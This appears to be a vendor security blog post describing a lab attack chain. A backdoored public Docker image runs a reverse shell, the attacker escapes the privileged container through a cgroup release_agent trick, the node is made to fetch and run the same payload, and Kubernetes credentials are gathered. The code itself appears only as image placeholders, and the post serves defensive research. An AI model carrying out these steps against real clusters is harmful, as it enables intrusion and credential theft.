Skip to main content

Container Compromise to IaaS Recon

March 24, 2020

Part one of a series.
At Optiv our expertise is both advisory and hands-on. In this post one of our in-the-trenches-experts explains his approach to an important cybersecurity challenge.

Previous research on container security has me interested in the mechanics behind a container breakout to gain access to the Kubernetes node. My interest was piqued when trying to understand how this might look like from the attacker’s point of view. I started by asking how I could infect a container? Once infected, how could I break out? Once I broke out, how could I get C2 on the host node?

I wasn’t only interested in the attacker perspective, although it’s usually where I start. I also wanted to understand the defenders’ perspective: if they’re armed with a solution like Aqua Security, where could the attack be stopped?

Let’s begin with the lab design. Below is an outline of my CI pipeline in AWS and the Azure AKS cluster used for command and control. For part one of this series Aqua is running, but isn’t set to enforce any prevention policies.

Img1

On a side note, the entire scenario was built out using two GitLab projects. One project created the malicious image, uploaded it to Docker Hub and then used it in a Kubernetes deployment task. The second project created an additional image with Metasploit installed, listener, Apache server hosting a file used during the container breakout and supporting scripts for this scenario.

In order for an attacker to succeed in this scenario several objectives must be completed. Each objective also presents an opportunity for the Blue Team to defend against the intrusion.

Initial Container Compromise

An easy way to compromise a container is to execute something malicious at runtime. I started by creating a malicious Ubuntu docker image with the goal of backdooring an image with a malicious file that executes at runtime. If someone uses the image in their environment the attacker will have access to the container that uses it. The malicious docker image for this demo was created as a project in Gitlab. The project contains three files.

Img2

The gitlab-ci.yml file (shown below) in conjunction with the Dockerfile is responsible for creating the malicious image and pushing it to dockerhub.

Code1
Code Snippet: build stage of gitlab-ci.yaml file

The gitlab-ci file creates the malicious elf file using the raesene/metasploit image by running msfvenom prior to the dockerfile build. The reverse_shell.elf file is then copied to the Ubuntu base image shown in the dockerfile below. The elf file is made executable and executes when the container runs.

Code 2
Code Snippet: Dockerfile

Once the image is created, it’s pushed to Docker Hub and now the image is available on a public repository.

Img3
Image: Publicly available DockerHub image with a reverse shell included.

If this image is used, the reverse_shell.elf will execute and the attacker will have access to the container. Kubernetes in AWS was used as the orchestration tool to manage this demo cluster. An example deployment yaml file using this image is shown below. The deployment file instructs our Kubernetes cluster to creat a container using the kiralyd/ubuntu:latest image from DockerHub.

Code 3
Code Snippet: deployment.yml used in the Kubernetes deployment task.

This an opportunistic attack at best, but the ramifications can be significant. The initial compromise takes place when a developer creates a container that uses malicious Docker image from Docker Hub. Once the container is running a reverse http connection is made to our C2 server sitting in Azure.

Img4
Image: Initial incoming C2 connection from the container.

Img5
Image: Basic recon from container C2 connection.

Container Breakout and Node Compromise

Now that the reverse connection is made, it’s important to call out the security context the container is running as. The whoami command confirms the attacker is running as the root user. This is confirmed by the security context in the deployment yaml file from earlier.

Img6

Running as privileged helps narrow the search for a container breakout. When I Googled [container breakouts] I stumbled on a great post from Trail of Bits breaking down a discovery by Felix Wilhem on how the Linux cgroup v1 “notification on release” feature can be used for container breakout. I encourage everyone to read it.

While I’m not going into great detail on the exploit itself, the Trail of Bits proof of concept code is interesting. Line 12 (shown in the image below) is the command that’s executed on the host.

Img7

Once I verified that the POC code worked I wanted to change the code to something more fitting for gaining host C2 access (see below). As seen in line 6, the commands that are executed in this breakout instruct the worker node to install curl and download the same reverse_shell.elf that was used to during the initial container compromise. Once downloaded, the file is made executable and then executed.

Code 4

These commands are executed through in the C2 connection to container. Once executed a new session is opened, only this time it’s from the Kubernetes worker node the container is running on.

Img9
Image: Incoming connection from the Kubernetes worker node or host that the container is running on.

Img10
Image: Established C2 connection to the AWS worker node.

Kubernetes and Infrastructure Recon

Upon session interaction running sysinfo and a quick “ls” on the etc/kubernetes folder shows us that we have compromised the host.

Img11

Now that the attacker has access to the worker node he/she can view and download the ca.crt, kublet-config.json or even token information. Not only can the attacker gain all of this information, but the kubeconfig file lets them know the EKS server and cluster name that this node is attached to.

Img12

Even running a simple arp informers attackers of recent neighbors they might be able to pivot to.

Img13

Hopefully this analysis provides some insight into what’s possible with this sort of attack and the impact it can have. It’s imperative to have visibility into Kubernetes clusters, containers, images and runtime execution. If your cluster is running in AWS, Azure or GCP it’s also important that you understand the IAM Roles, Security Groups and VPCs corresponding to each cluster and the worker nodes associated with them.

The second blog in this series will demonstrate how Aqua Security can be used to provide visibility and prevent this scenario from affecting your operation.


    Dan Kiraly

By: Dan Kiraly

Senior Research Analyst

See More

Related Blogs

February 20, 2020

Container Risks

Container technologies allow developers to assemble code and associated dependencies into a single package or container image.

See Details

October 11, 2019

CloudFormation Templates: What’s in That Stack?

In this blog we show an example of a basic formation template attack. It’s opportunistic and it would be very hard to target a specific organization i...

See Details

January 28, 2020

Orchestrator Risks

The health and security of the orchestration technology cluster is critically important and should not be understated.

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.


Privacy Policy

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.

Subscribe

Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cybersecurity Events in your area.